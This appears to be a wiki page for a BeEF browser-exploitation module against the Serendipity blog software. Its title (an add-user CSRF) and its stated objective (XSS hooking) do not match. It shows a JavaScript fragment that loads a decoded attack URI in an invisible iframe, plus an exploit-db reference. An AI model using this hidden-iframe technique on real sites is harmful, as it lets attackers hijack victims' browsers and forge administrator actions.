Clone
2
Module: Serendipity = 1.1.1 Add User CSRF
Haoxi Tan edited this page 2020-01-09 13:29:59 +10:00

Summary

  • Objective: hook Serendipity <= 1.6 using XSS

  • Authors: bcoles, Stefan Schurtz

  • Browsers: All

  • Code

Internal Working

Uses an invisible iframe to hook the serendipity instance

        var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');

        var serendipity_iframe = beef.dom.createInvisibleIframe();
        serendipity_iframe.setAttribute('src', uri);

References

http://www.exploit-db.com/exploits/18884/

Feedback